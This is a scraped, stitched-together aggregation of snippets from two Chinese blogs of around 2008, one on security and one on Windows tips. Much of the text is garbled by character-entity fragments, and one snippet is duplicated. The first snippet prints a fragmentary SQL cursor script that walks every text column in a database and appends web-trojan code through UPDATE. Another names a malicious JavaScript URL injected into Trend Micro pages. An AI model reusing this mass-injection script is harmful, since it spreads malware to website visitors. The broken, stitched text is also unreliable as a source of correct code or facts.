readsomestory.blogspot.com
月龙的安全空间: 最近比较流行的数据库挂马
http://readsomestory.blogspot.com/2008/12/blog-post_02.html
以前说过的趋势挂马事件,MS这个挂马方法已经流行了很久,从去年就大规模开始了,在网上可以搜到很多痕迹。 用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段). 8212;——————YD的分割——————————–. DECLARE @T varchar(255),. DECLARE Table Cursor CURSOR FOR. From sysobjects a,. Where a.id=b.id and. Axtype=’u’ and. Bxtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167). FETCH NEXT FROM Table Cursor INTO @T,@C. Exec(’update [’ @T ’] set [’ @C ’]=. Rtrim(convert(varchar,[’ @C ’]). 8221;挂马内容”’). FETCH NEXT FROM Table Cursor INTO @T,@C. 订阅: 帖子评论 (Atom). Imagine me without you.
readsomestory.blogspot.com
月龙的安全空间: 对趋势科技等数万网站被攻击的分析
http://readsomestory.blogspot.com/2008/12/blog-post.html
Http:/ www.nsfocus.net/news/6697. Http:/ hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html. Http:/ www.google.cn/search? Hl=zh-CN&q=site%3Atrendmicro.com www.2117966.net fuckjp.js&btnG=Google %E6%90%9C%E7%B4%A2&meta=&aq=f. 趋势科技的页面被插入过http:/ www.2117966.net/fuckjp.js相关的JS挂马。 Http:/ www.google.cn/search? Complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net fuckjp.js&meta=&aq=f. 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。 8212;————————. 8212;————————-. 订阅: 帖子评论 (Atom). Imagine me without you.
microsoftbat.blogspot.com
微软技术的三言两语: 一月 2009
http://microsoftbat.blogspot.com/2009_01_01_archive.html
30446;的:减轻服务器的访问负载,实现服务器的高可用性. 35797;验环境如下图:. 19968;、首先在. 19978;设置. 25171;开管理工具中的“网络负载平衡管理器”. 21491;击网络负载平衡群集,选择“新建群集”. 37197;置:此处填写虚拟. 22320;址,单击下一步. 21333;击“添加”. 27492;处填写本机的. 65292;单击确定,单击下一步. 31471;口规则:选择默认,单击下一步. 36830;接:填写完主机. 22320;址后单击“连接”主机. 26159;本机的. 28982;后单击一下本地连接,单击下一步. 20027;机参数:选择默认,单击完成. 20108;、在. 19978;设置. 25171;开管理工具中的网络负载平衡管理器. 32593;络负载平衡右击,选择“新建群集”. 22320;址填写虚拟. 65292;单击下一步. 21333;击添加. 22635;写本机. 65292;单击确定,单击下一步. 36830;接:主机填写本机. 19977;、客户机访问. 22312;客户机. 19978;访问.
microsoftbat.blogspot.com
微软技术的三言两语: winxp最大连接数怎么改?
http://microsoftbat.blogspot.com/2008/12/winxp.html
众所周知,为了防范蠕虫病毒的传播和攻击,Windows XP SP2将并发线程最多限制为10个。SP2利用Messages动态链接库,来实时监控每个进程的并发线程数目,一旦它发现某进程的线程数超过10个,就会屏蔽掉部分线程。SP2这样做,虽然可以防范震荡波类型的蠕虫病毒,加强系统安全,但是也带了一些负面影响,例如当你使用BT、P2P或FlashGet软件下载时,部分线程将被屏蔽掉,因此下载速度会变得很慢。为此,你可以采取以下对策,来突破TCP并发连接数,从而提高SP2的多线程访问速度。 为了突破SP2对TCP并发连接数的限制,网上曾经流传过一种修改注册表的方法,操作步骤如下:. 经过实际测试,我们发现该方法看起来有效,但实质上并不能突破并发连接数限制,提高SP2的多线程访问速度。因为SP2对线程数目的控制,是通过“Tcpip.sys”这个系统文件来实现的,并不是通过注册表实现的,因此,该方法不能增加SP2的TCP并发连接数。 接下来,双击打开下载文件ZIP压缩包,运行其中的替换工具EvID4226Patch.exe,随之将弹出一个命令行提示符窗口A...比特精灵附带的工具“TCP/IP...
microsoftbat.blogspot.com
微软技术的三言两语: 360安全卫士打补丁有问题的话可以用这个批处理
http://microsoftbat.blogspot.com/2009/02/360.html
Rem fix update garbage value. Set Update=HKLM SOFTWARE MicroSoft Update. Set Updates=HKLM SOFTWARE MicroSoft Updates. Rem set AutoUpdate="HKLM SOFTWARE Microsoft Windows CurrentVersion WindowsUpdate AutoUpdate". For /f "tokens=1 delims=" % a in ('reg query %Update% Findstr /i "UpdateExeVolatile"') do (. Reg delete % a /f. Echo %Update% is cleanned! For /f "tokens=1 delims=" % a in ('reg query %Updates% Findstr /i "UpdateExeVolatile"') do (. Reg delete % a /f. Echo %Updates% is cleanned!
microsoftbat.blogspot.com
微软技术的三言两语: Windows负载均衡配置
http://microsoftbat.blogspot.com/2009/01/windows.html
30446;的:减轻服务器的访问负载,实现服务器的高可用性. 35797;验环境如下图:. 19968;、首先在. 19978;设置. 25171;开管理工具中的“网络负载平衡管理器”. 21491;击网络负载平衡群集,选择“新建群集”. 37197;置:此处填写虚拟. 22320;址,单击下一步. 21333;击“添加”. 27492;处填写本机的. 65292;单击确定,单击下一步. 31471;口规则:选择默认,单击下一步. 36830;接:填写完主机. 22320;址后单击“连接”主机. 26159;本机的. 28982;后单击一下本地连接,单击下一步. 20027;机参数:选择默认,单击完成. 20108;、在. 19978;设置. 25171;开管理工具中的网络负载平衡管理器. 32593;络负载平衡右击,选择“新建群集”. 22320;址填写虚拟. 65292;单击下一步. 21333;击添加. 22635;写本机. 65292;单击确定,单击下一步. 36830;接:主机填写本机. 19977;、客户机访问. 22312;客户机. 19978;访问.
readsomestory.blogspot.com
月龙的安全空间: MS Windows Token Kidnapping本地提权的解决方案
http://readsomestory.blogspot.com/2008/12/ms-windows-token-kidnapping.html
MS Windows Token Kidnapping本地提权的解决方案. 虽然是个前段时间的漏洞了,但是之前一直只关注漏洞的利用,而未关注具体的解决方案,今天无意中和用户聊天时提到的,用户让帮忙找个解决方案,网上搜索了下,在 刺 那里找的相关的说明,并在微软的找到了具体的解决办法。详细如下:. 这个漏洞是由于在NetworkService 或者 LocalService 下运行的代码,可以访问同样是在 NetworkService 或者 LocalService 下运行的进程,某些进程允许提升权限为LocalSystem。 对于IIS,默认安装是不受影响的,受影响的是你的ASP.NET代码是以 Full Trust 运行,如果权限低于 Full Trust,也不会受影响。老的Asp 代码不受影响,只有 ASP.NET才受影响。 对于 SQL Server,如果用户以 administrative 权限运行代码,则会受影响. 对于Windows Server 2003,攻击者可以通过MSDTC获取token访问其他同样token的进程,从而可能造成提权。 4Double-click Distribute...
readsomestory.blogspot.com
月龙的安全空间: 我是一个渗透手
http://readsomestory.blogspot.com/2008/12/blog-post_25.html
12288; 作者:linzi 来源:Neeao's blog 题记: 有很多人不会明白我的想法,但希望我个人的技术理念能对一些人有帮助。把所学的东西上升为理论是为了更大限度的拓宽自已的思维,对于一个渗透者来说,思维 . 12288; 有很多人不会明白我的想法,但希望我个人的技术理念能对一些人有帮助。把所学的东西上升为理论是为了更大限度的拓宽自已的思维,对于一个渗透者来说,思维比0day要重要多了.渗透其实就是对已经掌握的各种技术加上自己的思维进行排列组合。 12288; 假说哪一天google被人入侵了,入侵的技术就是注射,很多人会说,这个我也会,没什么了不起的.是没什么了不起的,但为什么别人能做到用注射搞进去,而你不行,这就是区别,虚心的去学习好的理念,好的想法,会比报怨,嫉妒会好很多。 12288; 在这四年里面需要感谢的人很多,看到这个文章后,想对你说,谢谢! 12288; 这本书里面的技术都是一些很老的技术,文章主要给那些需要的人.牛人略过! 12288; 正文:. 12288; 例子:. 12288; 渗透某IDC技术细节:. 12288; = = = = = = = =...
readsomestory.blogspot.com
月龙的安全空间: SQL游标的原理与遍历
http://readsomestory.blogspot.com/2008/12/sql.html
声明:原创作品,未经授权,拒绝转载! 一般情况下,SQL查询结果都是多条纪录的结果集,而高级语言一次只能处理一条纪录,用游标机制,将多条纪录一次一条读取出来处理。从而把对集合的操作转化为对单个纪录的处理。游标使用的步骤如下:. 1、说明游标。说明游标的时候并不执行select语句。 2、打开游标。打开游标实际上是执行相应的select语句,把查询结果读取到缓冲区中。这时候游标处于活动状态,指针指向查询结果集的第一条纪录。 3、推进游标指针并读取当前纪录。用fetch语句把游标指针向前推进一条纪录,同时将缓冲区中的当前纪录读取出来送到变量中。fetch语句通常用在一个循环结构体中,通过循环执行fetch语句逐条取出结果集中的行进行处理。现在好多数据库中,还允许任意方向任意步长易懂游标指针,而不仅仅是把游标指针向前推进一行了。 4、关闭游标。用close语句关闭游标,释放结果集占用的缓冲区及其他资源。游标关闭后,就不再和原来的查询结果集相联系。但游标可以再次打开,与新的查询结果相联系。 订阅: 帖子评论 (Atom). Imagine me without you.